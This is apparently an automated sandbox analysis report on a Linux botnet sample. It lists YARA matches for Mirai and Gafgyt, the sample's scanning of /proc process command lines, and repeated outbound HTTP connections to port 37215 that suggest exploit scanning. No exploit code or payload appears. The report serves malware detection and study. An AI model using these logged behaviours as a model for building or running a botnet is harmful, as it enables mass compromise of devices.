                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
                  Source: Process Memory Space: bolonetwork.x86.elf PID: 5518, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: Process Memory Space: bolonetwork.x86.elf PID: 5518, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: Process Memory Space: bolonetwork.x86.elf PID: 5522, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: Process Memory Space: bolonetwork.x86.elf PID: 5522, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: classification engineClassification label: mal100.troj.linELF@0/0@22/0
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3761/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/1583/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/2672/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/110/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/111/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/112/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/113/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/234/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/1577/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/114/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/235/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/115/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/116/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/117/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/118/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/119/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/10/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/917/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/11/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/12/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/13/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/14/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/15/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/16/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/17/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/18/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/19/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/1593/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/240/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/120/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3094/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/121/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/242/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3406/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/1/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/122/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/243/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/2/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/123/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/244/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/1589/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/124/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/245/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/1588/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/125/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/4/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/246/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3402/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/126/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/5/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/247/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/127/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/6/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/248/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/128/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/7/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/249/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/8/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/129/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/800/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3762/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/9/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/801/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3763/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3764/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/803/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/20/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/806/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/21/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/807/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/928/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/22/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/23/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/24/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/25/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/26/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/27/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/28/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/29/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3420/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/490/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/250/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/130/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/251/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/131/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/252/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/132/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/253/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/254/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/255/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/135/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/256/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/1599/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/257/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/378/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/258/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/3412/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/259/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/30/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/35/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/1371/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/260/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/261/cmdlineJump to behavior
                  Source: /tmp/bolonetwork.x86.elf (PID: 5520)File opened: /proc/262/cmdlineJump to behavior
                  Source: /usr/bin/dash (PID: 5488)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.OoywKx7u03 /tmp/tmp.psVYtsi0OO /tmp/tmp.vhqRrcVLNpJump to behavior
                  Source: /usr/bin/dash (PID: 5489)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.OoywKx7u03 /tmp/tmp.psVYtsi0OO /tmp/tmp.vhqRrcVLNpJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52016 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38496 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33540 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55358 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43902 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39090 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60584 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42944 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46372 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48086 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56006 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55618 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34356 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46530 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57298 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51428 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36194 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38652 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40676 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49564 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60784 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41414 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34696 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60508 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36266 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49440 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42574 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43546 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46440 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54880 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46108 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45616 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54242 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53278 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36708 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48604 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40856 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38798 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52248 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57512 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57132 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52312 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37272 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45360 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36172 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45078 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42490 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51020 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54424 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44874 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32896 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33212 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56736 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39902 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43418 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34364 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36912 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41654 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58008 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54936 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41576 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40576 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41042 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42784 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42728 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52450 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47206 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47512 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48014 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40824 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47300 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36746 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52278 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35346 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57684 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38606 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56846 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43764 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37186 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34884 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43062 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38180 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50842 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46238 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33700 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34698 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56194 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48438 -> 37215
